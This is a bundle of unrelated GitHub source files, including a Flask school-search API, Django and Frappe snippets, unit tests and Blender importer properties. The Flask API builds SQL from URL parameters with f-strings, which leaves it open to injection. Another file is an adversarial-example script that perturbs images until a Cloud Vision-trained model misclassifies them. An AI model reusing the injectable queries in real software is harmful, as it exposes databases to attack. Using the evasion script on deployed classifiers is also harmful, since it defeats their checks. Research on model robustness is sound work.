{"seq_id":"13298880148","text":"# -*- coding: UTF-8 -*-\n\nimport psycopg2\nfrom psycopg2.extras import RealDictCursor\nimport os\nfrom flask import Flask, jsonify, abort, request, make_response, url_for\n# from flask_httpauth import HTTPBasicAuth\nfrom tenacity import retry, wait_fixed\nfrom geojson import Feature, Point, FeatureCollection\n\nPOSTGRES_USER = os.getenv(\"POSTGRES_USER\")\nPOSTGRES_PASSWORD = os.getenv(\"POSTGRES_PASSWORD\")\nPOSTGRES_DBNAME = os.getenv(\"POSTGRES_DBNAME\")\nPOSTGRES_HOST = os.getenv(\"POSTGRES_HOST\")\n\napp = Flask(__name__, static_url_path = \"\")\n\n# FIXME: limit when domain is defined\nfrom flask_cors import CORS, cross_origin\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n# auth = HTTPBasicAuth()\n# @auth.get_password\n# def get_password(username):\n# if username == 'miguel':\n# return 'python'\n# return None\n# @auth.error_handler\n# def unauthorized():\n# return make_response(jsonify( { 'error': 'Unauthorized access' } ), 403)\n# # return 403 instead of 401 to prevent browsers from displaying the default auth dialog\n\n# wait to see if db is up, 5 seconds between retries\n@retry(wait=wait_fixed(5))\ndef init_api():\n try:\n con = psycopg2.connect(dbname=POSTGRES_DBNAME, user=POSTGRES_USER, host=POSTGRES_HOST, password=POSTGRES_PASSWORD)\n con.set_session(autocommit=True)\n except Exception as e:\n print(\"I am unable to connect to the database.\")\n print(e)\n abort(400)\n\n cur = con.cursor(cursor_factory = psycopg2.extras.RealDictCursor)\n\n # 2000 meters\n searchRadius = 2000\n\n @app.errorhandler(400)\n def not_found(error):\n return make_response(jsonify( { 'error': 'Bad request' } ), 400)\n\n @app.errorhandler(404)\n def not_found(error):\n return make_response(jsonify( { 'error': 'Not found' } ), 404)\n\n @app.route('/', methods = ['GET'])\n # @auth.login_required\n def get_hello():\n return 'Hello World.'\n\n @app.route('/v1/schools/id/<cd_unidade_educacao>', methods = ['GET'])\n # sample url\n # http://localhost:8080/v1/schools/id/091383\n # @auth.login_required\n def get_school_id(cd_unidade_educacao):\n try:\n if validate_school_id_request(cd_unidade_educacao):\n 
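# NOTE: interpolating request values into SQL with f-strings is injection-prone; psycopg2 parameter binding (cur.execute with %s placeholders and a values tuple) would be the safer idiom for these queries\n 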
cur.execute(f\"\"\"\n SELECT *\n FROM unidades_educacionais_ativas_endereco_contato\n WHERE cd_unidade_educacao = '{cd_unidade_educacao}'\n \"\"\")\n schools = cur.fetchall()\n return jsonify( { 'results': schools } )\n else:\n abort(400)\n except Exception as e:\n print(e)\n abort(400)\n\n @app.route('/v1/schools/radius/<lat>/<lon>', methods = ['GET'])\n # sample url\n # http://localhost:8080/v1/schools/radius/-46.677023599999984/-23.5814295\n # @auth.login_required\n def get_schoolradius(lat, lon):\n try:\n if validate_wait_request(lat, lon):\n cur.execute(f\"\"\"SELECT *\n FROM unidades_educacionais_ativas_endereco_contato\n WHERE ST_DWithin(geom::geography, ST_SetSRID(ST_MakePoint({lon}, {lat}), 4326), {searchRadius})\n \"\"\")\n rowsSchools = cur.fetchall()\n return jsonify( { 'results': rowsSchools } )\n else:\n abort(400)\n except Exception as e:\n print(e)\n abort(400)\n\n\n @app.route('/v1/schools/radius/wait/<lat>/<lon>/<int:cd_serie>', methods = ['GET'])\n # sample url\n # http://localhost:8080/v1/schools/radius/wait/-46.677023599999984/-23.5814295/27\n # @auth.login_required\n def get_schoolradiuswait(lat, lon, cd_serie):\n try:\n # FIXME: validate by bounding box too\n if validate_wait_request(lat, lon, cd_serie):\n cur.execute(f\"\"\"\n SELECT *, (ST_Distance(geom::geography, ST_SetSRID(ST_MakePoint({lon}, {lat}), 4326)) / 1000) as distance FROM unidades_educacionais_ativas_endereco_contato AS u\n LEFT JOIN unidades_educacionais_infantil_vagas_serie as v\n ON u.cd_unidade_educacao = v.cd_unidade_educacao\n WHERE ST_DWithin(geom::geography, ST_SetSRID(ST_MakePoint({lon}, {lat}), 4326), {searchRadius})\n AND v.vagas_cd_serie_{cd_serie} IS NOT NULL\n ORDER BY distance\n \"\"\")\n rowsSchools = cur.fetchall()\n cur.execute(f\"\"\"\n SELECT count(DISTINCT cd_solicitacao_matricula_random)\n FROM unidades_educacionais_ativas_endereco_contato AS u\n LEFT JOIN solicitacao_matricula_grade_dw AS s\n ON u.cd_unidade_educacao::integer = s.cd_unidade_educacao\n WHERE ST_DWithin(geom::geography, ST_SetSRID(ST_MakePoint({lon}, {lat}), 4326), {searchRadius})\n AND s.cd_serie_ensino = {cd_serie}\n \"\"\")\n rowsWait = cur.fetchall()\n cur.execute(f\"\"\"\n SELECT dt_solicitacao as updated_at\n FROM solicitacao_matricula_grade_dw_atualizacao\n \"\"\")\n rowsUpdated = cur.fetchall()\n results = {'wait': rowsWait[0]['count'], 'wait_updated_at': rowsUpdated[0]['updated_at'], 'schools': rowsSchools}\n return jsonify( { 'results': results } )\n else:\n abort(400)\n except Exception as e:\n print(e)\n abort(400)\n\n def validate_wait_request(lat, lon, cd_serie=1):\n if float(lat) and float(lon) and (cd_serie in [1, 4, 27, 28]):\n return True\n else:\n return False\n\n def validate_school_id_request(id):\n if float(id):\n return True\n else:\n return False\n\ninit_api()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"prefeiturasp/SME-fila-da-creche-API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
{"seq_id":"75066601154","text":"import time\n\n\ndef clock(func):\n def clocked(*args, **kwargs):\n t0 = time.time()\n\n result = func(*args, **kwargs) # call the decorated function\n\n elapsed = time.time() - t0\n name = func.__name__\n arg_lst = []\n if args:\n arg_lst.append(', '.join(repr(arg) for arg in args))\n if kwargs:\n pairs = ['%s=%r' % (k, w) for k, w in sorted(kwargs.items())]\n arg_lst.append(', '.join(pairs))\n arg_str = ', '.join(arg_lst)\n print('[%0.8fs] %s(%s) -> %r' % (elapsed, name, arg_str, result))\n return result\n return clocked\n\n\n# The @cache decorator is implemented in a similar way\n_fib_cache = {1: 1, 2: 1} # key: position in the sequence, value: the Fibonacci number
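\n# (the standard library offers the same idea ready-made: functools.lru_cache, and functools.cache on Python 3.9+)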
\n\n@clock\ndef mem_fib(n):\n result = _fib_cache.get(n)\n if result is None:\n result = mem_fib(n-2) + mem_fib(n-1)\n _fib_cache[n] = result\n return result\n\nprint('fib(25) =', mem_fib(25))","repo_name":"avdivo/lesson_1","sub_path":"my_tasks/cache_and_clock.py","file_name":"cache_and_clock.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"69804458436","text":"from nonebot import on_command\nfrom nonebot.typing import T_State\nfrom nonebot.adapters import Bot, Event\n\nhelp_ = on_command('help', aliases={'帮助', 'searchbot'})\n\n\n@help_.handle()\nasync def handle_first_receive(bot: Bot, event: Event, state: T_State):\n await help_.send(\"\"\"\n命令起始符号:? ¿ / . 或(直接开始命令)\n\n以下为命令列表:\n sou/搜/搜索/search/sch/?/?/¿ + 关键词\n 获取关键词的搜索结果截图\n \n help/帮助/searchbot\n 获取本段帮助\"\"\")\n","repo_name":"Cynthia7979/searchbot-qq","sub_path":"src/plugins/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"31513876140","text":"import re\n\nFILE = open(\"digits.txt\",\"r\")\nit = 0\nfor line in FILE:\n it += 1 \n data = line.split()\n fa = open(str(it) + \".in\",\"w\")\n\n j = 0\n while j < len(data) - 1:\n fa.write(data[j])\n fa.write('\\n')\n j += 1\n fb = open(str(it) + \".out\",\"w\")\n fb.write(data[j])\n","repo_name":"kc97ble/Problems","sub_path":"digits (1)/statement/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
{"seq_id":"72565038274","text":"from django.contrib import messages\nfrom django.http import HttpResponse\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.views.generic import View\nfrom django.shortcuts import render, redirect\nfrom django.core.files.base import ContentFile\n\nfrom datetime import datetime\n\nfrom service.forms import CreateOrderForm\n\nfrom .models import Order, Photo\n\n\nclass ServicePage(View):\n def get(self, request):\n form = CreateOrderForm()\n return render(request, 'service/index.html', context={'form': form})\n\n def post(self, request):\n form = CreateOrderForm(request.POST, request.FILES)\n\n if form.is_valid():\n cd = form.cleaned_data\n order = Order.objects.create(last_name=cd['last_name'],\n first_name=cd['first_name'],\n tel=cd['tel'],\n size=cd['size'],\n quantity=cd['quantity'],\n comment=cd['comment'],\n total_price=cd['total_price'],\n accept_conditions=cd['accept_conditions'])\n for f in request.FILES.getlist('photos'):\n data = f.read()\n date = datetime.now()\n photo = Photo(order=order)\n photo.photos.save(f'{date.minute}{date.second}.{f.name.split(\".\")[-1]}', ContentFile(data))\n photo.save()\n subject = f'{cd[\"tel\"]} | {cd[\"last_name\"]} | {cd[\"size\"]} x {cd[\"quantity\"]} = {cd[\"total_price\"]}р. '\n message = f'{cd[\"tel\"]} \\n {cd[\"last_name\"]} \\n {cd[\"first_name\"]} \\n {cd[\"size\"]} x {cd[\"quantity\"]} = {cd[\"total_price\"]}р. \\n {cd[\"comment\"]} '\n send_mail(subject=subject, message=message, from_email=settings.EMAIL_HOST_USER, recipient_list=['dpmbg@yandex.ru', 'pmbg@yandex.ru'])\n messages.success(request, f'Ваш заказ успешно зарегистрирован! 
'\n f'Для оплаты заказа вам необходимо пополнить кошелек ЯндексДеньги на сумму в размере - {cd[\"total_price\"]} руб. ')\n return redirect('ServicePage')\n return HttpResponse('Error')\n\n","repo_name":"Blastz13/micro_printing_service","sub_path":"service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
{"seq_id":"8614823496","text":"import frappe\nfrom frappe.utils.nestedset import get_descendants_of\n\n\n@frappe.whitelist()\ndef filter_territory(doctype, txt, searchfield, start, page_len, filters):\n\t\"\"\"filter territory\"\"\"\n\n\tterritory_list = get_descendants_of(\"Territory\", filters.get(\"region\"))\n\tterritory_list.append(filters.get(\"region\"))\n\n\treturn frappe.get_all('Territory',\n\t\tfilters={\n\t\t\t'parent_territory': ('in', territory_list),\n\t\t\t'territory_name': (\"like\", \"%{0}%\".format(txt))\n\t\t},\n\t\tfields=[\"name\"],\n\t\tas_list=1)\n\ndef rearrange_standard_fields():\n\t\"\"\"Rearrange standard field in lead doctype\"\"\"\n\tcount = 1\n\tfor df in frappe.get_meta(\"Lead\").get(\"fields\"):\n\t\tif df.fieldname in [\"territory\", \"address_html\", \"contact_html\", \"contact_by\"]:\n\t\t\tcount= count + 1\n\t\t\tfrappe.db.sql(\"\"\"UPDATE `tabDocField` SET idx={0} WHERE fieldname=%s and parent='Lead' \"\"\".format(count), df.fieldname, as_dict=True)\n","repo_name":"Bloomstack/bloomstack_core","sub_path":"bloomstack_core/hook_events/lead.py","file_name":"lead.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
{"seq_id":"71002781954","text":"\"\"\"\r\nCreated on Sun May 3 09:32:13 2020\r\n\r\n@author: Hadi Zanddizari\r\nemail: hadiz@usf.edu\r\n\"\"\"\r\n##############################################################################################################\r\nfrom __future__ import print_function\r\nimport tensorflow as tf\r\nfrom PIL import Image\r\nimport glob\r\nimport numpy as np\r\nimport os\r\nfrom matplotlib import pyplot as plt\r\nimport scipy.misc\r\nfrom skimage.transform import resize\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\nfrom scipy.fftpack import dct,idct \r\n##############################################################################################################\r\ndef load_images_from_folder(folder):\r\n images = [];listName = []\r\n for filename in os.listdir(folder):\r\n img = cv2.imread(os.path.join(folder,filename))\r\n if img is not None:\r\n images.append(img)\r\n listName.append(filename)\r\n return images,listName\r\n##############################################################################################################\r\ndef Klargest(x,k):\r\n nk = k *k *3;\r\n vx = x.reshape(-1);\r\n ss = np.argsort(np.multiply(-1, np.absolute(vx)),axis=0);#-1 for descending sort\r\n idx_K_LaS = np.zeros(vx.shape);\r\n idx_K_LaS [ss[0:nk]] = 1;\r\n return idx_K_LaS \r\n##############################################################################################################\r\n#path of test sample\r\ninput_path='PATH TO legitimate sample'\r\noutput_path='PATH TO Output Folder to SAVE Adversarial Example'\r\nclasses=['spyder','dog','cat','squirrel','sheep','butterfly','horse','elephant','cow','chicken']\r\n#link of public dataset: https://www.kaggle.com/alessiocorrado99/animals10\r\n# In this example, we input an image with a 'chicken' label,\r\n# if the input sample has another label, the argument of 'classes[9]' should be updated accordingly. \r\noriginal_label =classes[9]; \r\nlist0 = [];listName0 = []; \r\nlist0,listName0 = load_images_from_folder(input_path)\r\n##############################################################################################################\r\ninterpreter = tf.lite.Interpreter(model_path=\"model.tflite\")\r\ninterpreter.allocate_tensors()\r\n# Get input and output tensors.\r\ninput_details = interpreter.get_input_details();print()\r\noutput_details = interpreter.get_output_details();\r\nprint(output_details)\r\ninput_shape = input_details[0]['shape']\r\n##############################################################################################################\r\n#allList = list0[0:100] +list1[0:100] +list2[0:100] +list3[0:100] +list4[0:100] +list5[0:100] +list6[0:100] +list7[0:100] +list8[0:100]+ list9[0:100] \r\nallList = list0 \r\nk=16; #number of nonzeros \r\nalpha = 0.001 # MSE\r\nQueryNumber = 1000; #number of query\r\nL =len(allList);\r\nctr_k = 0;ctr_l = 0;ctr_a = 0;\r\nidx_k = np.zeros((L,1));\r\n\r\nfor idx in range(L):\r\n img1 = allList[idx];\r\n legitimateImg=np.zeros(img1.shape,np.uint8);\r\n legitimateImg[:,:,0]=img1[:,:,2];legitimateImg[:,:,1]=img1[:,:,1];legitimateImg[:,:,2]=img1[:,:,0];\r\n legImg = resize(legitimateImg, (224, 224));#img = img/255\r\n \r\n # Testing the model to observe if it initially predicts the legitimate sample correctly\r\n input_data = (255*np.expand_dims(legImg, axis=0)).astype(np.uint8);\r\n interpreter.set_tensor(input_details[0]['index'], input_data)\r\n interpreter.invoke()\r\n output_data_leg = interpreter.get_tensor(output_details[0]['index'])\r\n pro_leg = (output_data_leg[0][[output_data_leg.argmax(axis=-1)[0]]][0]) / np.sum(output_data_leg)\r\n label = classes[output_data_leg.argmax(axis=-1)[0]];\r\n \r\n\r\n if label!=original_label:\r\n print('This sample has already been misclassified by the model---Try another sample');\r\n continue;\r\n \r\n################################ adding noise to the k largest components in sparse domain ##############\r\n #DCT Transformation\r\n yd1 = dct(legImg, axis=0, norm=\"ortho\");\r\n yd2 = dct(yd1, axis=1, norm=\"ortho\");\r\n idx_K_LaS = Klargest(yd2,k) # position of K LaS components \r\n model_fooled = False;\r\n \r\n for q in range(QueryNumber):\r\n y = np.random.normal(0,1,legImg.shape)\r\n yd1 = dct(y, axis=0, norm=\"ortho\");\r\n yd2 = dct(yd1, axis=1, norm=\"ortho\"); \r\n if not model_fooled: \r\n yd3 = np.zeros(yd2.shape);\r\n temp = yd2.reshape(-1);\r\n yd3 = (np.multiply(temp,idx_K_LaS )).reshape(224,224,3) \r\n #inverse DCT Transformation\r\n iyd1 = idct(yd3, axis=1, norm=\"ortho\");\r\n iyd2 = idct(iyd1, axis=0, norm=\"ortho\") \r\n yLF = np.sqrt(alpha) * iyd2 / np.sqrt(np.square(iyd2).mean(axis=None))#limited noise\r\n xAdvKlargest = np.add(yLF,legImg)# adding limited noise to the legitimate sample \r\n MSE = (np.square(yLF)).mean(axis=None); #print(MSE)\r\n############sending Query to the TFLite model trained by Google Cloud Vision for evaluation\r\n input_data = (255*np.expand_dims(xAdvKlargest, axis=0)).astype(np.uint8);\r\n interpreter.set_tensor(input_details[0]['index'], input_data)\r\n interpreter.invoke()\r\n output_data = interpreter.get_tensor(output_details[0]['index'])\r\n pro = (output_data[0][[output_data.argmax(axis=-1)[0]]][0]) / np.sum(output_data)\r\n if classes[output_data.argmax(axis=-1)[0]]!= label:\r\n print('================================================');\r\n print('------The model is fooled in query 
number: ', q);\r\n print('legitimate predicted label was: ', classes[output_data_leg.argmax(axis=-1)[0]],' ', pro_leg)\r\n print(output_data_leg)\r\n\r\n print(' Adversarial predicted label is: ', classes[output_data.argmax(axis=-1)[0]],' ', pro )\r\n print(output_data)\r\n print(\"************************\")\r\n model_fooled = True;\r\n \r\n temp_img=np.zeros(xAdvKlargest.shape);\r\n temp_img[:,:,0]=xAdvKlargest[:,:,2];temp_img[:,:,1]=xAdvKlargest[:,:,1];temp_img[:,:,2]=xAdvKlargest[:,:,0];\r\n cv2.imwrite(output_path+'adv.jpg', 255*temp_img)\r\n break\r\n else:\r\n print(\"query number: \" + str(q) +' unsuccessful!')\r\n\r\n\r\n##############################################################################################################\r\n\r\nplt.imshow(legImg);plt.title('Legitimate image: '+ classes[output_data_leg.argmax(axis=-1)[0]],);plt.show()\r\nplt.imshow(xAdvKlargest); plt.title('Adversarial image: '+classes[output_data.argmax(axis=-1)[0]]);plt.show()\r\n","repo_name":"hadizand/LaS-Adversarial-example","sub_path":"GoogleAPI/GoogleCloudVisionAttack.py","file_name":"GoogleCloudVisionAttack.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25706580334","text":"import json\nimport os\nimport unittest\n\nfrom httpretty import HTTPretty, httprettified\n\nfrom rcbu.client.connection import Connection\nfrom rcbu.common.constants import IDENTITY_TOKEN_URL\nimport rcbu.common.schedule as schedule\nimport tests.mock.auth as mock_auth\nimport tests.mock.configuration as mock_config\nimport rcbu.client.backup_configuration as backup_config\nfrom rcbu.common.exceptions import (\n DisconnectedError, InconsistentInclusionsError\n)\n\n\ndef _mock_auth(status):\n reply = mock_auth.authenticate()\n HTTPretty.register_uri(HTTPretty.POST, IDENTITY_TOKEN_URL,\n status=status, body=json.dumps(reply))\n\n\ndef _mock_config(status, endpoint, config_id):\n reply = mock_config.backup_configuration(config_id)\n url = '{0}/{1}/{2}'.format(endpoint, 'backup-configuration', config_id)\n HTTPretty.register_uri(HTTPretty.GET, url, json.dumps(reply))\n\n\ndef _quick_config(connection=None):\n return backup_config.from_dict(mock_config.backup_configuration(),\n connection=connection)\n\n\nclass TestLoadBackupConfiguration(unittest.TestCase):\n def test_from_dict_works_as_expected(self):\n body = mock_config.backup_configuration()\n config = backup_config.from_dict(body)\n self.assertEqual(config.id, 0)\n self.assertEqual(config.agent_id, 1)\n self.assertEqual(config.notify_on_failure, True)\n self.assertEqual(config.notify_on_success, False)\n self.assertEqual(config.email,\n 'mock@mock.com')\n self.assertEqual(config.name, 'mock')\n self.assertEqual(config.encrypted, False)\n self.assertEqual(config.enabled, True)\n self.assertEqual(config.deleted, False)\n\n def test_from_dict_throws_key_error_when_missing_attr(self):\n data_keys = mock_config.backup_configuration().keys()\n for key in data_keys:\n mock = mock_config.backup_configuration()\n del mock[key]\n with self.assertRaises(KeyError):\n backup_config.from_dict(mock)\n\n\nclass TestBackupConfiguration(unittest.TestCase):\n @httprettified\n def setUp(self):\n _mock_auth(200)\n self.connection = Connection(username='a', region='dfw', password='a')\n config_api = mock_config.backup_configuration()\n self.config = backup_config.from_dict(config_api, self.connection)\n\n def test_id_matches_expected(self):\n self.assertEqual(self.config.id, 0)\n\n def 
test_agent_id_matches_expected(self):\n self.assertEqual(self.config.agent_id, 1)\n\n def test_name_matches_expected(self):\n self.assertEqual(self.config.name, 'mock')\n\n def test_notification_settings_match_expected(self):\n self.assertEqual(self.config.email, 'mock@mock.com')\n self.assertEqual(self.config.notify_on_success, False)\n self.assertEqual(self.config.notify_on_failure, True)\n\n def test_enabled_matches_expected(self):\n self.assertEqual(self.config.enabled, True)\n\n def test_encrypted_matches_expected(self):\n self.assertEqual(self.config.encrypted, False)\n\n def test_deleted_matches_expected(self):\n self.assertEqual(self.config.deleted, False)\n\n def test_schedule_matches_expected(self):\n self.assertEqual(self.config.schedule, schedule.manually())\n\n def test_reschedule_works(self):\n self.config.reschedule(schedule.hourly(13))\n self.assertEqual(self.config.schedule, schedule.hourly(13))\n\n def test_update_notification_settings_works(self):\n self.config.update_notification_settings(email='woot',\n notify_on_failure=False,\n notify_on_success=True)\n self.assertEqual(self.config.email, 'woot')\n self.assertEqual(self.config.notify_on_success, True)\n self.assertEqual(self.config.notify_on_failure, False)\n\n def test_rename_works(self):\n self.config.rename('woot')\n self.assertEqual(self.config.name, 'woot')\n\n def test_disconneted_error_raised_if_no_connection(self):\n self.config.connect(None)\n with self.assertRaises(DisconnectedError):\n self.config.enable()\n\n @httprettified\n def _test_toggle(self, enabled=True):\n url = '{0}/{1}/{2}/{3}'.format(self.connection.host,\n 'backup-configuration', 'enable',\n self.config.id)\n HTTPretty.register_uri(HTTPretty.POST, url, status=200,\n body=json.dumps({'IsActive': enabled}))\n if enabled:\n self.config.enable()\n else:\n self.config.disable()\n self.assertEqual(self.config.enabled, enabled)\n\n def test_disable_works(self):\n self._test_toggle(enabled=False)\n\n def test_enable_works(self):\n self._test_toggle(enabled=True)\n\n @httprettified\n def test_delete_works(self):\n url = '{0}/backup-configuration/{1}'.format(self.connection.host,\n self.config.id)\n HTTPretty.register_uri(HTTPretty.DELETE, url, status=204)\n self.assertEqual(self.config.deleted, False)\n self.config.delete()\n self.assertEqual(self.config.deleted, True)\n\n def test_excluding_nonexistent_path_raises_error(self):\n with self.assertRaises(IOError):\n self.config.exclude('not_found')\n\n def test_including_nonexistent_path_raises_error(self):\n with self.assertRaises(IOError):\n self.config.exclude('not_found')\n\n def test_including_duplicates_strips_dups(self):\n name = 'setup.py'\n self.config.include([name, name])\n self.assertEqual(self.config.inclusions, {os.path.realpath(name)})\n\n def test_excluding_duplicates_strips_dups(self):\n name = 'setup.py'\n self.config.exclude([name, name])\n self.assertEqual(self.config.exclusions, {os.path.realpath(name)})\n\n def test_excluding_included_files_raises_inconsistent(self):\n name = 'setup.py'\n self.config.include([name])\n with self.assertRaises(InconsistentInclusionsError):\n self.config.exclude([name])\n\n def test_including_excluded_files_raises_inconsistent(self):\n name = 'setup.py'\n self.config.exclude([name])\n with self.assertRaises(InconsistentInclusionsError):\n self.config.include([name])\n\n @httprettified\n def test_reload_works(self):\n url = '{0}/backup-configuration/{1}'.format(self.connection.host,\n self.config.id)\n conf = 
mock_config.backup_configuration(agent_id=100)\n HTTPretty.register_uri(HTTPretty.GET, url, status=200,\n body=json.dumps(conf))\n self.config.reload()\n self.assertEqual(self.config.agent_id, 100)\n\n @httprettified\n def test_update_works(self):\n url = '{0}/backup-configuration/{1}'.format(self.connection.host,\n self.config.id)\n HTTPretty.register_uri(HTTPretty.PUT, url, status=200)\n self.assertIsNone(self.config.update())\n\n @httprettified\n def test_create_works(self):\n url = '{0}/backup-configuration'.format(self.connection.host)\n HTTPretty.register_uri(HTTPretty.POST, url, status=200,\n body=json.dumps({'BackupConfigurationId': 100}))\n old_id = self.config.id\n self.config.create()\n self.assertEqual(self.config.id, 100)\n self.assertNotEqual(self.config.id, old_id)\n","repo_name":"rackerlabs/cbu-sdk-python","sub_path":"deprecated/tests/unit/client/test_backup_configuration.py","file_name":"test_backup_configuration.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"}
{"seq_id":"28225439907","text":"import webapp2\nimport logging\n\nclass GeoLocation(webapp2.RequestHandler):\n def get(self):\n ip = self.request.remote_addr\n\n if ip == \"127.0.0.1\":\n countryCode = \"gb\"\n else:\n countryCode = self.request.headers['X-AppEngine-country']\n\n logging.info(\"IP is '%s', country code is %s\" % (ip, countryCode))\n\n if self.request.get(\"callback\"): # JSONP Request\n self.response.headers['Content-Type'] = 'text/javascript'\n self.response.out.write(self.request.get(\"callback\") + \"('\")\n self.response.out.write(countryCode)\n self.response.out.write(\"')\")\n else:\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(countryCode)\n\n\napp = webapp2.WSGIApplication([('/geo-location', GeoLocation)], debug=True)\n","repo_name":"guardian/geo-location","sub_path":"geo-location.py","file_name":"geo-location.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"9140309488","text":"from bpy.props import (\n StringProperty,\n BoolProperty,\n EnumProperty,\n FloatProperty,\n IntProperty,\n FloatVectorProperty,\n)\nfrom photogrammetry_importer.utility.blender_utility import (\n adjust_render_settings_if_possible,\n)\nfrom photogrammetry_importer.utility.blender_camera_utility import (\n principal_points_initialized,\n set_principal_point_for_cameras,\n add_cameras,\n add_camera_animation,\n)\nfrom photogrammetry_importer.types.camera import Camera\n\n\nclass CameraImportProperties:\n \"\"\"\n This class encapsulates Blender UI properties that are required to\n visualize the reconstructed cameras correctly.\n \"\"\"\n\n image_fp_items = [\n (Camera.IMAGE_FP_TYPE_NAME, \"File Name\", \"\", 1),\n (Camera.IMAGE_FP_TYPE_RELATIVE, \"Relative Path\", \"\", 2),\n (Camera.IMAGE_FP_TYPE_ABSOLUTE, \"Absolute Path\", \"\", 3),\n ]\n image_fp_type: EnumProperty(\n name=\"Image File Path Type\",\n description=\"Choose how image file paths are treated, \"\n + \"i.e. absolute path, relative path or file name\",\n items=image_fp_items,\n )\n image_dp: StringProperty(\n name=\"Image Directory\",\n description=\"Assuming that the SfM reconstruction result is \"\n + \"located in or . \"\n + \"The addon uses either (if available) \"\n + \"or as default image path. For MVS reconstruction \"\n + \"results of Colmap, Meshroom or MVE the addon may or may not \"\n + \"search for the images inside the corresponding workspace\",\n # Can not use subtype='DIR_PATH' while importing another file (i.e. nvm)\n default=\"\",\n )\n import_cameras: BoolProperty(\n name=\"Import Cameras\", description=\"Import Cameras\", default=True\n )\n default_width: IntProperty(\n name=\"Default Width\",\n description=\"Width, which will be used if corresponding \"\n + \"image is not found\",\n default=-1,\n )\n default_height: IntProperty(\n name=\"Default Height\",\n description=\"Height, which will be used if corresponding \"\n + \"image is not found\",\n default=-1,\n )\n default_focal_length: FloatProperty(\n name=\"Focal length in pixel\",\n description=\"Value for missing focal length in LOG (Open3D) file. \",\n default=float(\"nan\"),\n )\n default_pp_x: FloatProperty(\n name=\"Principal Point X Component\",\n description=\"Principal Point X Component, which will be used if \"\n + \"not contained in the NVM (VisualSfM) / LOG (Open3D) file. If no \"\n + \"value is provided, the principal point is set to the image \"\n + \"center\",\n default=float(\"nan\"),\n )\n default_pp_y: FloatProperty(\n name=\"Principal Point Y Component\",\n description=\"Principal Point Y Component, which will be used if \"\n + \"not contained in the NVM (VisualSfM) / LOG (Open3D) file. If no \"\n + \"value is provided, the principal point is set to the image \"\n + \"center\",\n default=float(\"nan\"),\n )\n add_background_images: BoolProperty(\n name=\"Add a Background Image for each Camera\",\n description=\"The background image is only visible by viewing the \"\n + \"scene from a specific camera\",\n default=True,\n )\n add_image_planes: BoolProperty(\n name=\"Add an Image Plane for each Camera\",\n description=\"Add an Image Plane for each Camera - only for \"\n + \"non-panoramic cameras\",\n default=False,\n )\n add_image_plane_emission: BoolProperty(\n name=\"Add Image Plane Color Emission\",\n description=\"Add image plane color emission to increase the \"\n + \"visibility of the image planes\",\n default=True,\n )\n image_plane_transparency: FloatProperty(\n name=\"Image Plane Transparency Value\",\n description=\"Transparency value of the image planes: \"\n + \"0 = invisible, 1 = opaque\",\n default=0.5,\n min=0,\n max=1,\n )\n add_depth_maps_as_point_cloud: BoolProperty(\n name=\"Add Depth Maps (EXPERIMENTAL)\",\n description=\"Add the depth map (if available) as point cloud \"\n + \"for each Camera\",\n default=False,\n )\n use_default_depth_map_color: BoolProperty(\n name=\"Use Default Depth Map Color\",\n description=\"If not selected, each depth map is colorized with \"\n + \"a different (random) color\",\n default=False,\n )\n depth_map_default_color: FloatVectorProperty(\n name=\"Depth Map Color\",\n description=\"Depth map color\",\n subtype=\"COLOR\",\n size=3, # RGBA colors are not compatible with the GPU Module\n default=(0.0, 1.0, 0.0),\n min=0.0,\n max=1.0,\n )\n depth_map_display_sparsity: IntProperty(\n name=\"Depth Map Display Sparsity\",\n description=\"Adjust the sparsity of the depth maps. A value of 10 \"\n + \"means that every 10th depth map value is converted to a 3D point\",\n default=10,\n min=1,\n )\n depth_map_id_or_name_str: StringProperty(\n name=\"Depth Map IDs or Names to Display\",\n description=\"A list of camera indices or names (separated by \"\n + \"whitespaces) used to select the depth maps, which will be \"\n + \"displayed as point clouds. 
If no indices are provided, all \"\n + \"depth maps are shown. The names must not contain whitespaces\",\n default=\"\",\n )\n add_camera_motion_as_animation: BoolProperty(\n name=\"Add Camera Motion as Animation\",\n description=\"Add an animation reflecting the camera motion. The \"\n + \"order of the cameras is determined by the corresponding file \"\n + \"name\",\n default=True,\n )\n animation_frame_source: EnumProperty(\n name=\"Use original frames\",\n items=(\n (\"ORIGINAL\", \"Original Frames\", \"\"),\n (\"ADJUSTED\", \"Adjusted Frames\", \"\"),\n ),\n )\n add_animated_camera_background_images: BoolProperty(\n name=\"Add Background Images for the Animated Camera\",\n description=\"The background images are only visible by viewing the \"\n + \"scene from the animated camera at the corresponding time step\",\n default=True,\n )\n number_interpolation_frames: IntProperty(\n name=\"Number of Frames Between two Reconstructed Cameras\",\n description=\"The poses of the animated camera are interpolated\",\n default=0,\n min=0,\n )\n\n interpolation_items = [\n (\"LINEAR\", \"LINEAR\", \"\", 1),\n (\"BEZIER\", \"BEZIER\", \"\", 2),\n (\"SINE\", \"SINE\", \"\", 3),\n (\"QUAD\", \"QUAD\", \"\", 